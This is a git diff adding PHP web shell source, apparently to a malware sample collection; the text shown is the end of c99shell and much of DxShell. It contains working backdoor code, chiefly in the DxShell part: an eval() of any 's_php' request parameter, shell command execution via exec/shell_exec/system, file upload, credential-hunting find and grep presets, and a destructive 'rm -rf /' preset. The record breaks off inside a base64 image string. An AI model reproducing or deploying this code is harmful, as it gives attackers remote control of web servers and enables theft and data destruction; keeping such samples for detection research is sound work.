+"kwDWEK3OACF6nDdhngWYoEgEMLde4IbS7SjPX93JrIwiIJrxTqTfERJUHTODgSAQ3QVjsZsgyu16". +"seAwLAEAOw==", +"ext_vbs"=> +"R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAggAAAICAgMDAwAD//wCAgAAAAAAAAAAAAANQ". +"GLrcECXGJsWTJYyybbTQVBAkCBSgyKGPl2YjCcwnG2qrV13TQBI6GwbXqb0yCgCJJYSZOK4LZPDY". +"DHSvgEAQAGxrzQKNhgFtz+j0eM2eJQAAOw==", +"ext_vcf"=> +"R0lGODlhEAAQADMAACH5BAEAAAoALAAAAAAQABAAgwAAAMDAwICAAP//AAAA/4CAgIAAAAAAgP//". +"//8AAAAAAAAAAAAAAAAAAAAAAAAAAARYUElAK5VY2X0xp0LRTVYQAMWZaZWJAMJImiYVhEVmu7W4". +"srfeSUAUeFI10GBJ1JhEHcEgNiidDIaEQjqtAgiEjQFQXcK+4HS4DPKADwey3PjzSGH1VTsTAQA7", +"ext_wav"=> +"R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAggAAAP///4CAgMDAwICAAP//AAAAAAAAAANU". +"aGrS7iuKQGsYIqpp6QiZRDQWYAILQQSA2g2o4QoASHGwvBbAN3GX1qXA+r1aBQHRZHMEDSYCz3fc". +"IGtGT8wAUwltzwWNWRV3LDnxYM1ub6GneDwBADs=", +"ext_wma"=> +"R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAggAAAP///4CAgMDAwICAAP//AAAAAAAAAANU". +"aGrS7iuKQGsYIqpp6QiZRDQWYAILQQSA2g2o4QoASHGwvBbAN3GX1qXA+r1aBQHRZHMEDSYCz3fc". +"IGtGT8wAUwltzwWNWRV3LDnxYM1ub6GneDwBADs=", +"ext_wmf"=> +"R0lGODlhEAAQADMAACH5BAEAAAoALAAAAAAQABAAgwAAAMDAwP///4CAgIAAAICAAP//AP8AAAAA". +"gAAA/wAAAAAAAAAAAAAAAAAAAAAAAARgUKlBqx0yDyEACBxHZRMXDGC4YQOwCVQKdJ7bggcBtl8Q". +"AJNfIBcoGD4CH1CBSAByxp5pOUAgCFFf6HexIKeore+2BaJ8p1sqaU6NpdOgiQJny5On+u+e7qH3". +"EzWCgwARADs=", +"ext_wri"=> +"R0lGODlhEAAQADMAACH5BAEAAAgALAAAAAAQABAAg////wAAAICAgMDAwICAAAAAgAAA////AAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARRUMhJkb0C6K2HuEiRcdsAfKExkkDgBoVxstwAAypduoao". +"a4SXT0c4BF0rUhFAEAQQI9dmebREW8yXC6Nx2QI7LrYbtpJZNsxgzW6nLdq49hIBADs=", +"ext_xml"=> +"R0lGODlhEAAQAEQAACH5BAEAABAALAAAAAAQABAAhP///wAAAPHx8YaGhjNmmabK8AAAmQAAgACA". +"gDOZADNm/zOZ/zP//8DAwDPM/wAA/wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAVk4CCOpAid0ACsbNsMqNquAiA0AJzSdl8HwMBOUKghEApbESBUFQwABICx". +"OAAMxebThmA4EocatgnYKhaJhxUrIBNrh7jyt/PZa+0hYc/n02V4dzZufYV/PIGJboKBQkGPkEEQ". +"IQA7", +"ext_xsl"=> +"R0lGODlhEAAQAEQAACH5BAEAABIALAAAAAAQABAAhAAAAPHx8f///4aGhoCAAP//ADNmmabK8AAA". +"gAAAmQCAgDP//zNm/zOZ/8DAwDOZAAAA/zPM/wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAV3oDSMZDlKqBgIa8sKzpAOr9s6gqzWPOADItZhpVAwhCvgIHBICBSCRQMh". +"SAyVTZZiEXkgVlYl08loPCBUa0ApIBBWiDhSAHQXfLZavcAnABQGgYFJBHwDAAV+eWt2AAOJAIKD". +"dBKFfQABi0AAfoeZPEkSP6OkPyEAOw==" +); +$imgequals = array( +"ext_tar"=>array("ext_tar","ext_r00","ext_ace","ext_arj","ext_bz","ext_bz2","ext_tbz","ext_tbz2","ext_tgz","ext_uu","ext_xxe","ext_zip","ext_cab","ext_gz","ext_iso","ext_lha","ext_lzh","ext_pbk","ext_rar","ext_uuf"), +"ext_php"=>array("ext_php","ext_php3","ext_php4","ext_php5","ext_phtml","ext_shtml"), +"ext_htaccess"=>array("ext_htaccess","ext_htpasswd") +); + ksort($arrimg); + if (!$getall) + { + header("Content-type: image/gif"); + header("Cache-control: public"); + header("Expires: ".date("r",mktime(0,0,0,1,1,2030))); + header("Cache-control: max-age=".(60*60*24*7)); + header("Last-Modified: ".date("r",filemtime(__FILE__))); + foreach($imgequals as $k=>$v) + { + if (in_array($img,$v)) {$img = $k;} + } + if (empty($arrimg[$img])) {$img = "small_unk";} + if (in_array($img,$ext_tar)) {$img = "ext_tar";} + echo base64_decode($arrimg[$img]); + } + else + { + echo "
    "; + $k = array_keys($arrimg); + foreach ($k as $u) + { + echo $u.":
    "; + } + echo "
    "; + } + exit; +} +if ($act == "about") +{ + $dàta = "Any stupid copyrights and copylefts"; + echo $data; +} + +$microtime = round(getmicrotime()-$starttime,4); +?> +
    + + +

    :: Command execute ::

    Enter:
     
    Select:
     
    +
    + + + + + + +

    :: Search ::

      - regexp 

    :: Upload ::

     


    +

    :: Make Dir ::

     

    :: Make File ::

     

    --[ c99shell v. © powered by Captain Crunch Security Team | http://ccteam.ru | Generation time: ]--

    + + diff --git a/PHP/Backdoor.PHP.Agent.as b/PHP/Backdoor.PHP.Agent.as new file mode 100644 index 00000000..46134354 --- /dev/null +++ b/PHP/Backdoor.PHP.Agent.as @@ -0,0 +1,2029 @@ + 'AboutBox', + + 'DIR' => 'Dir browse', + 'UPL' => 'Upload file', + 'FTP' => 'FTP Actions', + + 'F_CHM' => 'File CHMOD', + 'F_VIEW' => 'File viewer', + 'F_ED' => 'File Edit', + 'F_DEL' => 'File Delete', + 'F_REN' => 'File Rename', + 'F_COP' => 'File Copy', + 'F_MOV' => 'File Move', + 'F_DWN' => 'File Download', + + 'SQL' => 'SQL Maintenance', + 'SQLS' => 'SQL Search', + 'SQLD' => 'SQL Dump', + 'PHP' => 'PHP C0nsole', + 'COOK' => 'Cookies Maintenance', + 'CMD' => 'C0mmand line', + + 'MAIL' => 'Mail functions', + 'STR' => 'String functions', + 'PRT' => 'Port scaner', + 'SOCK' => 'Raw s0cket', + 'PROX' => 'HTTP PROXY', + 'XPL' => 'Expl0its', + 'XSS' => 'XSS Server', + ); +$GLOB['DxGET_Vars']=array(/* GET variables used by shell */ +'dxinstant', 'dxmode', 'dximg', 'dxparam', 'dxval', 'dx_ok', 'dx_gzip', +'dxdir', 'dxdirsimple', 'dxfile', +'dxsql_s', 'dxsql_l', 'dxsql_p', 'dxsql_d','dxsql_q', +); + +$GLOB['VAR']['PHP']['Presets']=array( + /* Note, that no comments are allowed in the code */ + 'phpinfo' => 'phpinfo();', + 'GLOBALS' => 'print \'\'; print_r($GLOBALS);', + 'php_ini' => '$INI=ini_get_all(); ' + ."\n".'print \'<table border=0><tr>\'' + ."\n\t".'.\'<td class="listing"><font class="highlight_txt">Param</td>\'' + ."\n\t".'.\'<td class="listing"><font class="highlight_txt">Global value</td>\'' + ."\n\t".'.\'<td class="listing"><font class="highlight_txt">Local Value</td>\'' + ."\n\t".'.\'<td class="listing"><font class="highlight_txt">Access</td></tr>\';' + ."\n".'foreach ($INI as $param => $values) ' + ."\n\t".'print "\n".\'<tr>\'' + ."\n\t\t".'.\'<td class="listing"><b>\'.$param.\'</td>\'' + ."\n\t\t".'.\'<td class="listing">\'.$values[\'global_value\'].\' </td>\'' + ."\n\t\t".'.\'<td class="listing">\'.$values[\'local_value\'].\' </td>\'' + ."\n\t\t".'.\'<td class="listing">\'.$values[\'access\'].\' </td></tr>\';', + 'extensions' => '$EXT=get_loaded_extensions ();' + ."\n".'print \'<table border=0><tr><td class="listing">\'' + ."\n\t".'.implode(\'</td></tr>\'."\n".\'<tr><td class="listing">\', $EXT)' + ."\n\t".'.\'</td></tr></table>\'' + ."\n\t".'.count($EXT).\' extensions loaded\';', + ); +$GLOB['VAR']['CMD']['Presets']=array( + 'Call Nik8 with an axe'=>'[w0rning] rm -rf /', + 'show opened ports'=>'netstat -an | grep -i listen', + 'find config* files'=>'find / -type f -name "config*"', + 'find all *.php files with word "password"'=>'find / -name *.php | xargs grep -li password', + 'find all writable directories and files'=>'find / -perm -2 -ls', + 'list file attribs on a second extended FS'=>'lsattr -va', + 'View syslog.conf'=>'cat /etc/syslog.conf', + 'View Message of the day'=>'cat /etc/motd', + 'View hosts'=>'cat /etc/hosts', + 'List processes'=>'ps auxw', + 'List user processes'=>'ps ux', + 'Locate httpd.conf'=>'locate httpd.conf', + 'Interfaces'=>'ifconfig', + 'CPU'=>'/proc/cpuinfo', + 'RAM'=>'free -m', + 'HDD'=>'df -h', + 'OS Ver'=>'sysctl -a | grep version', + 'Kernel ver' =>'cat /proc/version', + 'Is cURL installed? ' => 'which curl', + 'Is wGET installed? ' => 'which wget', + 'Is lynx installed? ' => 'which lynx', + 'Is links installed? ' => 'which links', + 'Is fetch installed? ' => 'which fetch', + 'Is GET installed? ' => 'which GET', + 'Is perl installed? ' => 'which perl', + 'Where is apache ' => 'whereis apache', + 'Where is perl ' => 'whereis perl', + 'Pack directory' =>'"tar -zc /path/ -f name.tar.gz"', + ); + + +################################################################################### +####################+++++++++# F U N C T I O N S #+++++++++++++#################### +################################################################################### +function DxError($errstr) +{global $DX_Header_drawn;print "\n\n".'<table border=0 cellspacing=0 cellpadding=2><tr>' + .'<td class=error '.((!$DX_Header_drawn)?'style="color:#000000; background-color: #FF0000; font-weight: bold; font-size: 11pt;position:absolute;top=0;left=0;"':'').'>' + .'Err: '.$errstr.'</td></tr></table>'."\n\n"; return '';} + +function DxWarning($warn) +{print "\n\n".'<table border=0 cellspacing=0 cellpadding=2><tr><td class=warning><b>W0rning:</b> '.$warn.'</td></tr></table>'."\n\n"; return '';} + +function DxImg($imgname) +{ +global $DXGLOBALSHIT; +if ($DXGLOBALSHIT) return '<font class="img_replacer">'.$imgname.'</font>'; /* globalshit doesn't give a chance for our images to survive */ +return '<img src="'.DxURL('kill', '').'&dxmode=IMG&dximg='.$imgname.'" title="'.$imgname.'" alt"'.$imgname.'">'; +} + +function DxSetCookie($name, $val, $exp) +{ +if (!headers_sent()) return setcookie($name, $val, $exp, '/'); +?> +<script> +var curCookie = "<?=$name;?>=" + escape("<?=$val;?>") +"; expires=<?=date('l, d-M-y H:i:s', $exp);?> GMT; path=/;"; +document.cookie = curCookie; +</script> +<? +} + +function DxRandom($range='48-57,65-90,97-122') +{ +$range=explode(',',$range); +$range=explode('-', $range[ rand(0,count($range)-1) ] ); +return rand($range[0],$range[1]); +} + +function DxRandomChars($num) +{ +$ret=''; +for ($i=0;$i<$num;$i++) $ret.=chr(DxRandom('48-57,65-90,97-122')); +return $ret; +} + +function DxZeroedNumber($int, $totaldigits) +{ +$str=(string)$int; +while (strlen($str)<$totaldigits) $str='0'.$str; +return $str; +} + +function DxPrint_ParamState($name, $state, $invert=false) +{ +print $name.' : '; $invert=(bool)$invert; +if (is_bool($state)) + print ($state)?'<font color=#'.(($invert)?'FF0000':'00FF00').'><b>ON</b></font>':'<font color=#'.(($invert)?'00FF00':'FF0000').'><b>OFF</b></font>'; + else print '<b>'.$state.'</b>'; +} + +function DxStr_FmtFileSize($size) +{ + if($size>= 1073741824) {$size = round($size / 1073741824 * 100) / 100 . " GB"; } +elseif($size>= 1048576) {$size = round($size / 1048576 * 100) / 100 . " MB"; } +elseif($size>= 1024) {$size = round($size / 1024 * 100) / 100 . " KB"; } + else {$size = $size . " B";} +return $size; +} + +function DxDate($UNIX) {return date('d.M\'Y H:i:s', $UNIX); } + +function DxDesign_DrawBubbleBox($header, $body, $width) +{ +$header=str_replace(array('"',"'","`"), array('&#x02DD;','&#x0027;',''), $header); +$body=str_replace(array('"',"'","`"), array('&#x02DD;','&#x0027;',''), $body); +return ' onmouseover=\'showwin("'.$header.'","'.$body.'",'.$width.',1)\' onmouseout=\'showwin("","",0,0)\' onmousemove=\'movewin()\' '; +} + +function DxChmod_Str2Oct($str) /* rwxrwxrwx => 0777 */ +{ +$str = str_pad($str,9,'-'); +$str=strtr($str, array('-'=>'0','r'=>'4','w'=>'2','x'=>'1') ); +$newmode=''; +for ($i=0; $i<3; $i++) $newmode .= $str[$i*3]+$str[$i*3+1]+$str[$i*3+2]; + +return $newmode; +} + +function DxChmod_Oct2Str($perms) /* 777 => rwxrwxrwx. USE ONLY STRING REPRESENTATION OF $oct !!!! */ +{ +$info=''; +if (($perms & 0xC000) == 0xC000) $info = 'S'; /* Socket */ + elseif (($perms & 0xA000) == 0xA000) $info = 'L'; /* Symbolic Link */ +elseif (($perms & 0x8000) == 0x8000) $info = '&nbsp;'; /* '-'*//* Regular */ +elseif (($perms & 0x6000) == 0x6000) $info = 'B'; /* Block special */ +elseif (($perms & 0x4000) == 0x4000) $info = 'D'; /* Directory*/ +elseif (($perms & 0x2000) == 0x2000) $info = 'C'; /* Character special*/ +elseif (($perms & 0x1000) == 0x1000) $info = 'P'; /* FIFO pipe*/ +else $info = '?'; /* Unknown */ +if (!empty($info)) $info='<font class=rwx_sticky_bit>'.$info.'</font>'; +/* Owner */ +$info .= (($perms & 0x0100) ? 'r' : '-'); +$info .= (($perms & 0x0080) ? 'w' : '-'); +$info .= (($perms & 0x0040) ? + (($perms & 0x0800) ? 's' : 'x' ) : + (($perms & 0x0800) ? 'S' : '-')); +$info .= '/'; +/* Group */ +$info .= (($perms & 0x0020) ? 'r' : '-'); +$info .= (($perms & 0x0010) ? 'w' : '-'); +$info .= (($perms & 0x0008) ? + (($perms & 0x0400) ? 's' : 'x' ) : + (($perms & 0x0400) ? 'S' : '-')); +$info .= '/'; +/* World */ +$info .= (($perms & 0x0004) ? 'r' : '-'); +$info .= (($perms & 0x0002) ? 'w' : '-'); +$info .= (($perms & 0x0001) ? + (($perms & 0x0200) ? 't' : 'x' ) : + (($perms & 0x0200) ? 'T' : '-')); + + return $info; +} + +function DxFileToUrl($filename) +{/* kills & and = to be okay in URL */ +return str_replace(array('&','=','\\'), array('%26', '%3D','/'), $filename); +} + +function DxFileOkaySlashes($filename) +{return str_replace('\\', '/', $filename);} + +function DxURL($do='kill', $these='') /* kill: '' - kill all ours, 'a,b,c' - kill $a,$b,$c ; leave: '' - as is, leave 'a,b,c' - leave only $a,$b,$c */ +{ +global $GLOB; +if ($these=='') $these=$GLOB['DxGET_Vars']; else $these=explode(',', $these); + +$ret=$_SERVER['PHP_SELF'].'?'; +if (!empty($_GET)) + for ($i=0, $INDEXES=array_keys($_GET), $COUNT=count($INDEXES); $i<$COUNT; $i++) + if ( !in_array($INDEXES[$i], $GLOB['DxGET_Vars']) OR ( /* if not ours - add */ + ($do=='kill' AND !in_array($INDEXES[$i], $these)) + OR + ($do=='leave' AND in_array($INDEXES[$i], $these)) + )) + $ret.=$INDEXES[$i].='='.$_GET[ $INDEXES[$i] ].( ($i==($COUNT-1))?'':'&' ); +if (substr($ret, -1,1)=='&') $ret=substr($ret, 0, strlen($ret)-1); +return $ret; +} + +function DxGETinForm($do='kill', $these='') /* Equal to DxURL(), but prints out $_GET as form <input type=hidden> params */ +{ +$link=substr(strchr(DxURL($do, $these), '?'), 1); +$link=explode('&', $link); +print "\n".'<!--$_GET;-->'; +for ($i=0, $COUNT=count($link); $i<$COUNT; $i++) + { + $cur=explode('=', $link[$i]); + print '<input type=hidden name="'.str_replace('"', '&quot;', $cur[0]).'" value="'.str_replace('"', '&quot;', $cur[1]).'">'; + } +} + +function DxGotoURL($URL, $noheaders=false) +{ +if ($noheaders or headers_sent()) + { + print "\n".'<div align=center>Redirecting...<br><a href="'.$URL.'">Press here in shit happens</a>'; + print '<script>location="'.$URL.'";</script>'; + /* print $str.='<META HTTP-EQUIV="Refresh" Content="1, URL='.$URL.'">'; */ + } + else + header('Location: '.$URL); +return 1; +} + +if (!function_exists('mime_content_type')) + { + if ($GLOB['SYS']['OS']['id']!='Win') + { function mime_content_type($f) + { + $f = @escapeshellarg($f); + return @trim(`file -bi `.$f); + } + } + else + { + function mime_content_type($f) {return 'Content-type: text/plain';} /* Nothing alike under win =( if u have some thoughts - touch me */ + } + } + + +function DxMySQL_FetchResult($MySQL_res, &$MySQL_Return_Array, $idmode=false) /* Fetches mysql return array (associative) */ +{ +$MySQL_Return_Array=array(); + +if ($MySQL_res===false) return 0; +if ($MySQL_res===true) return 0; + +$ret=mysql_num_rows($MySQL_res); if ($ret<=0) return 0; + +if ($idmode) while (!(($MySQL_Return_Array[]=mysql_fetch_array($MySQL_res, MYSQL_NUM))===FALSE)) {} + else while (!(($MySQL_Return_Array[]=mysql_fetch_array($MySQL_res, MYSQL_ASSOC))===FALSE)) {} +array_pop($MySQL_Return_Array); + +for ($i=0; $i<count($MySQL_Return_Array); $i++) /* Kill the fucking slashes */ + { + if ($i==0) + { + $INDEXES=array_keys($MySQL_Return_Array[$i]); + $count=count($INDEXES); + } + for ($j=0; $j<$count; $j++) + { + $key=&$INDEXES[$j]; + $val=&$MySQL_Return_Array[$i][$key]; + if (is_string($val)) $val=stripcslashes($val); + } + } +return $ret; +} + +function DxMySQLQ($query, $die_on_err) +{ +$q=mysql_query($query); +if (mysql_errno()!=0) + { + DxError('" '.$query.' "'."\n".'<br>MySQL:#'.mysql_errno().' - '.mysql_error()); + if ($die_on_err) die(); + } +return $q; +} + +function DxDecorVar(&$var, $htmlstr) +{ +if (is_null($var)) return 'NULL'; +if (!isset($var)) return '[!isset]'; + +if (is_bool($var)) return ($var)?'true':'false'; +if (is_int($var)) return (int)$var; +if (is_float($var)) return number_format($var, 4, '.', ''); +if (is_string($var)) + { + if (empty($var)) return '&nbsp;'; + if (!$htmlstr) return ''.($var).''; + else return ''.str_replace("\n", "<br>", str_replace("\r","", htmlspecialchars($var))).''; + } +if (is_array($var)) return '(ARR)'.var_export($var, true).'(/ARR)'; +if (is_object($var)) return '(OBJ)'.var_export($var, true).'(/OBJ)'; +if (is_resource($var)) return '(RES:'.get_resource_type($var).')'.var_export($var, true).'(/RES)'; +return '(???)'.var_export($var, true).'(/???)'; +} + +function DxHTTPMakeHeaders($method='', $URL='', $host='', $user_agent='', $referer='', $posts=array(), $cookie=array()) +{ +if (!empty($posts)) + { + $postValues=''; + foreach( $posts AS $name => $value ) {$postValues .= urlencode( $name ) . "=" . urlencode( $value ) . '&';} + $postValues = substr( $postValues, 0, -1 ); + $method = 'POST'; + } else $postValues = ''; + + if (!empty($cookie)) + { + $cookieValues=''; + foreach( $cookie AS $name => $value ) {$cookieValues .= urlencode( $name ) . "=" . urlencode( $value ) . ';';} + $cookieValues = substr( $cookieValues, 0, -1 ); + } else $cookieValues = ''; + +$request = $method.' '.$URL.' HTTP/1.1'."\r\n"; +if (!empty($host)) $request .= 'Host: '.$host."\r\n"; +if (!empty($cookieValues)) $request .='Cookie: '.$cookieValues."\r\n"; +if (!empty($user_agent)) $request .= 'User-Agent: '.$user_agent.' '."\r\n"; +$request .= 'Connection: Close'."\r\n"; /* Or connection will be endless */ +if (!empty($referer)) $request .= 'Referer: '.$referer."\r\n"; +if ( $method == 'POST' ) + { + $lenght = strlen( $postValues ); + $request .= 'Content-Type: application/x-www-form-urlencoded'."\r\n"; + $request .= 'Content-Length: '.$lenght."\r\n"; + $request .= "\r\n"; + $request .= $postValues; + } +$request.="\r\n\r\n"; +return $request; +} + +function DxFiles_UploadHere($path, $filename, &$contents) +{if (empty($contents)) die(DxError('Received empty')); +$filename='__DxS__UPLOAD__'.DxRandomChars(3).'__'.$filename; +if (!($f=fopen($path.$filename, 'w'))) + { + $path='/tmp/'; + if (!($f=fopen($path.$filename, 'w'))) + die(DxError('Writing denied. Save to "'.$path.$filename.'" also failed! =(')); + else + DxWarning('Writing failed, but saved to "'.$path.$filename.'"! =)'); + } +fputs($f, $contents); +fclose($f); +print "\n".'Saved file to "'.$path.$filename.'" - OK'; +print "\n".'<br><a href="'.DxURL('kill', '').'&dxmode=DIR&dxdir='.DxFileToUrl(dirname($path)).'">[Go DIR]</a>';; +} + +function DxExecNahuj($cmd, &$OUT, &$RET) /* returns the name of function that exists, or FALSE */ +{ +$OUT=array(); $RET=''; +if (function_exists('exec')) + { if (!empty($cmd)) exec($cmd, $OUT, $RET); /* full array output */ + return array(true,true,'exec', ''); + } + elseif (function_exists('shell_exec')) + { if (!empty($cmd)) $OUT[0]=shell_exec($cmd); /* full string output, no RETURN */ + return array(true,false,'shell_exec', '<s>exec</s> shell_exec'); + } + elseif (function_exists('system')) + { if (!empty($cmd)) $OUT[0]=system($cmd, $RET); /* last line of output */ + return array(true,false,'system', '<s>exec</s> <s>shell_exec</s> system<br>Only last line of output is available, sorry =('); + } + else return array(FALSE, FALSE, '&lt;noone&gt;', '<s>exec</s> <s>shell_exec</s> <s>system</s> Bitchy admin has disabled command line!! =(');; +} + +################################################################################### +#####################++++++++++++# L O G I N #++++++++++++++++##################### +################################################################################### +if ( isset($_GET['dxmode'])?$_GET['dxmode']=='IMG':false ) + { /* IMGS are allowed without passwd =) */ $GLOB['SHELL']['USER']['Login']=''; + $GLOB['SHELL']['USER']['Passw']=''; + } + +if ( isset($_GET['dxinstant'])?$_GET['dxinstant']=='logoff':false ) + { + if ($DXGLOBALSHIT) + { if (isset($_COOKIE['DxS_AuthC'])) DxSetCookie('DxS_AuthC','---', 1); + } + else + { + header('WWW-Authenticate: Basic realm="==== HIT CANCEL OR PRESS ESC ===='.base_convert(crc32(mt_rand(0, time())),10,36).'"'); header('HTTP/1.0 401 Unauthorized'); + } + + print '<html>Redirecting... press <a href="'.DxURL('kill','').'">here if shit happens</a>'; + DxGotoURL(DxURL('kill',''), '1noheaders'); + die(); + } + +if (((strlen($GLOB['SHELL']['USER']['Login'])+strlen($GLOB['SHELL']['USER']['Passw']))>=2)) + { if ($DXGLOBALSHIT) + { if (isset($_POST['DxS_Auth']) or isset($_COOKIE['DxS_AuthC'])) + { if (!( + + ((@$_POST['DxS_Auth']['L']==$GLOB['SHELL']['USER']['Login']) AND /* form */ + (@$_POST['DxS_Auth']['P']==$GLOB['SHELL']['USER']['Passw'] + OR + (strlen($GLOB['SHELL']['USER']['Passw'])==32 AND @$_POST['DxS_Auth']['P']==md5($GLOB['SHELL']['USER']['Passw'])) + )) + OR + @$_COOKIE['DxS_AuthC']==md5($GLOB['SHELL']['USER']['Login'].$GLOB['SHELL']['USER']['Passw']) /* cookie */ + + )) + {print(DxError('Fucked off brutally'));unset($_POST['DxS_Auth'], $_COOKIE['DxS_AuthC']);} + else DxSetCookie('DxS_AuthC', md5($GLOB['SHELL']['USER']['Login'].$GLOB['SHELL']['USER']['Passw']), time()+60*60*24*2); + } + if (!isset($_POST['DxS_Auth']) AND !isset($_COOKIE['DxS_AuthC'])) + { + print "\n".'<form action="'.DxURL('kill', '').'" method=POST style="position:absolute;z-index:100;top:0pt;left:40%;width:100%;height:100%;">'; + print "\n".'<br><input type=text name="DxS_Auth[L]" value="<LOGIN>" onfocus="this.value=\'\'" style="width:200pt">'; + print "\n".'<br><input type=text name="DxS_Auth[P]" value="<PASSWORD>" onfocus="this.value=\'\'" style="width:200pt">'; + print "\n".'<br><input type=submit value="Ok" style="width:200pt;"></form>'; + print "\n".'</form>'; + die(); + } + } + else + { + if (!isset($_SERVER['PHP_AUTH_USER'])) + { + header('WWW-Authenticate: Basic realm="DxShell '.$GLOB['SHELL']['Ver'].' Auth"'); + header('HTTP/1.0 401 Unauthorized'); + /* Result if user hits cancel button */ + unset($_GET['dxinstant']); + die(DxError('Fucked off brutally')); + } + else + if (!( $_SERVER['PHP_AUTH_USER']==$GLOB['SHELL']['USER']['Login'] + AND ( + $_SERVER['PHP_AUTH_PW']==$GLOB['SHELL']['USER']['Passw'] + OR + (strlen($GLOB['SHELL']['USER']['Passw'])==32 AND md5($_SERVER['PHP_AUTH_PW'])==$GLOB['SHELL']['USER']['Passw']) + ) + )) + { + header('WWW-Authenticate: Basic realm="DxS '.$GLOB['SHELL']['Ver'].' Auth: Fucked off brutally"'); + header('HTTP/1.0 401 Unauthorized'); + /* Result if user hits cancel button */ + unset($_GET['dxinstant']); + die(DxError('Fucked off brutally')); + } + } + } + +################################################################################### +####################++++++# I N S T A N T U S A G E #+++++++#################### +################################################################################### +if (!isset($_GET['dxmode'])) $_GET['dxmode']='DIR'; else $_GET['dxmode']=strtoupper($_GET['dxmode']); +if ($_GET['dxmode']=='DDOS') /* DDOS mode. In other case, EVALer of everything that comes in $_GET['s_php'] OR $_POST['s_php'] */ + { + $F = $_GET + $_POST; + if (!isset($F['s_php'])) die('o_O Tync DDOS Remote Shell '.$GLOB['SHELL']['Ver']."\n".'<br>Use GET or POST to set "s_php" variable with code to be executed =)<br>Enjoy!'); + eval(stripslashes($F['s_php'])); + die("\n\n".'<br><br>'.'o_O Tync DDOS Web Shell '.$GLOB['SHELL']['Ver'].((!isset($F['s_php']))?"\n".'<br>'.'$s_php is responsible for php-code-injection':'')); + } +if ($_GET['dxmode']=='IMG') + { + $IMGS=array( + 'DxS' => 'R0lGODlhEAAQAIAAAAD/AAAAACwAAAAAEAAQAAACL4yPGcCs2NqLboGFaXW3X/tx2WcZm0luIcqFKyuVHRSLJOhmGI4mWqQAUoKPYqIAADs=', + 'folder'=> 'R0lGODlhDwAMAJEAAP7rhriFIP///wAAACH5BAEAAAIALAAAAAAPAAwAAAIklIJhywcPVDMBwpSo3U/WiIVJxG0IWV7Vl4Joe7Jp3HaHKAoFADs=', + 'foldup'=> 'R0lGODlhDwAMAJEAAP7rhriFIAAAAP///yH5BAEAAAMALAAAAAAPAAwAAAIw3IJiywcgRGgrvCgA2tNh/Dxd8JUcApWgaJFqxGpp+GntFV4ZauV5xPP5JIeTcVIAADs=', + 'view' => 'R0lGODlhEAAJAJEAAP///wAAAP///wAAACH5BAEAAAIALAAAAAAQAAkAAAIglB8Zx6aQYGIRyCpFsFY9jl1ft4Fe2WmoZ1LROzWIIhcAOw==', + 'del' => 'R0lGODlhEAAQAKIAAIoRGNYnOtclPv///////wAAAAAAAAAAACH5BAEAAAQALAAAAAAQABAAAANASArazQ4MGOcLwb6BGQBYBknhR3zhRHYUKmQc65xgKM+0beKn3fErm2bDqomIRaMluENhlrcFaEejPKgL3qmRAAA7', + 'copy' => 'R0lGODlhEAAQAKIAAP//lv///3p6egAAAP///wAAAAAAAAAAACH5BAEAAAQALAAAAAAQABAAAAM+SKrT7isOQGsII7Jq7/sTdWEh53FAgwLjILxp2WGculIurL68XsuonCAG6PFSvxvuuDMOQcCaZuJ8TqGQSAIAOw==', + 'move' => 'R0lGODlhEAAQAJEAADyFFLniPu79wP///yH5BAEAAAMALAAAAAAQABAAAAI3nD8AyAgiVnMihDidldmAnXFfIB6Pomwo9kCu5bqpRdf18qGjTpom6AkBO4lhqHLhCHtEj/JQAAA7', + 'exec' => 'R0lGODlhoQFLAKIAADc2NX98exkYGFxZWaOengEBAQAAAAAAACwAAAAAoQFLAAAD/1i63P4wykmrvTjrzbv/YCiOpCcMAqCuqhCAgCDPM1AEKQsM8SsXAuAviNOtXJQYrXYCmh5BRWA3qFp5rwlqSRtMTrnWMSuZGlvkjpIrs0mipbh8nnFD4B08VGKP6Bt/DoELgyR9Dod7fklvjIsfhU50k5SVFjY/C26RFoVBmGxNi6BKCp8UUXpBmXReNTsxBV5fkoSrjDNOKQWJiEJsvRmRnJbFxoYMq7HBGJ68Qrozs3xAKr60fswiXipWpdOLf7cTfVHLuIKiT4/H7e7IydbPkKO60CngEDY7q7faphJQUJpiJcCWIPkU3XFkSobAf89S/doBYti7ixjVNOCnAP8iqnpLgFTRdqrKA4ieEpYQQGCAwSo0ZH1kFyGRPIigNvKo2Cijz5/k4tnxiK3mvY48cMKy1ZGhIJUkWLqEGRNqsp7UAII5FTTXqpE8aQIdO9YOPn9h94BSBhOiFVXzsAKiSIlAAINrnFglJFdfPIFxjUrEt5OeWLKIMcI5AY5oI1Z8Mf2yEhjCS75OUOorPKmlQS4yiyYbR83cTq6lo410fPgqscSw5wzlAYf1nRx+GVDZpwVvzB+aH9Be6aDlwaozCS0ltnhpU9FIk6Y9KS+29WKuGK9R1+FKv1xbYgC4+zkNHsKABaGjAUvyQgyJPucu3abKlF2LstsHT+HFkfH/d41Xywab9EMFDtcleAwVUVHBWTYMflFFS+KxIEMa7+n0WjOJGHeFNxi+4WB6RTl31QXdkCgCerFsqOCLDtC2hHg3jEfAjR8WcQY/5PV41412AeljgD0CeeOQQwppWwM4vGTfjeOFYUQKVIbiwgqrodGfS0i+8KORR95l5S5TfPmSQTqe4aWPRoppRjdw+sfFCjeQB6ZdIcKoZ3J+udTSRgPGKAiAaIqpyAkv/bNDABQOaI5T0UXUGiCawNXPaKFFUJCPNuTZgCv29eGeZbVxiYIPkwJEEJd3bZGFi3u+eKk9RBC6nUzf/UIEL1gy+iOrOpCZAqc7dsPoAC3B6oCc/20EiOs9aJEWmRAHZdaflOKdAECQRwLpBap7vGAqcmvl0qksO4B5Q0SgubdYDkH+iNe5sdbbVbjjUcWftKryumiRwG5nw6mctvHfsK3+meoCPkgD07Pq8TvtWb9URmnDMxqE55DfBsqkC1Mhd4tE56rA5rrfxTSqJlN5Rh4L69or8x6FkKfvD64AdJV/hNrs8n3sycJqq//pwCqysWQYAbOLCpQzpfaoJRJgwHnMALP1IYtslx1HUijQOEej8rr2+cjSPENULU7LPSZljacz1+sJSy+H9DRmuw5tM5oubUem3m4HOzSyFk2A8VSx3D2aRZjcjFq4vNRn59ZIdr2